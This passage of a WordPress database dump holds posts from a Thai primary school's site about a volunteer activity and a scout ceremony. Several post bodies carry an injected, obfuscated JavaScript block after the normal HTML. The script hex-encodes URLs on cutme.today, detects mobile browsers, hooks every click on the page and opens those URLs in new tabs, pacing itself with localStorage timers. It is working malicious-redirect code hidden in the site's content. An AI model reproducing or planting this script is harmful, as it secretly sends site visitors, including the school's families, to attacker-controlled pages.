_0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','275-revision-v1','','','2024-07-30 11:23:12','2024-07-30 04:23:12','',275,'http://pakhaeng.ssk.in.th/?p=281',0,'revision','',0),
(282,1,'2024-07-30 11:24:26','2024-07-30 04:24:26','','Screenshot 2024-07-30 111731','','inherit','','closed','','screenshot-2024-07-30-111731','','','2024-07-30 11:24:26','2024-07-30 04:24:26','',275,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Screenshot-2024-07-30-111731.jpg',0,'attachment','image/jpeg',0),
(285,1,'2024-07-30 11:29:00','2024-07-30 04:29:00','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":286} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรม จิตอาสา พี่เพื่อน้อง','','publish','closed','closed','','%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-2','','','2024-07-31 21:52:11','2024-07-31 14:52:11','',0,'http://pakhaeng.ssk.in.th/?p=285',0,'post','',0),
(286,1,'2024-07-30 11:26:34','2024-07-30 04:26:34','','จิตอาสา','','inherit','','closed','','%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2','','','2024-07-30 11:26:34','2024-07-30 04:26:34','',285,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4',0,'attachment','video/mp4',0),
(287,1,'2024-07-30 11:27:43','2024-07-30 04:27:43','','Screenshot 2024-07-30 112049','','inherit','','closed','','screenshot-2024-07-30-112049','','','2024-07-30 11:27:43','2024-07-30 04:27:43','',285,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Screenshot-2024-07-30-112049.jpg',0,'attachment','image/jpeg',0),
(288,1,'2024-07-30 11:28:45','2024-07-30 04:28:45','','Screenshot 2024-07-30 112145','','inherit','','closed','','screenshot-2024-07-30-112145','','','2024-07-30 11:28:45','2024-07-30 04:28:45','',285,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Screenshot-2024-07-30-112145.jpg',0,'attachment','image/jpeg',0),
(289,1,'2024-07-30 11:29:00','2024-07-30 04:29:00','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":286} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','285-revision-v1','','','2024-07-30 11:29:00','2024-07-30 04:29:00','',285,'http://pakhaeng.ssk.in.th/?p=289',0,'revision','',0),
(290,1,'2024-07-30 11:33:03','2024-07-30 04:33:03','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":278} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สวนสนาม.mp4\"></video></figure>\n<!-- /wp:video 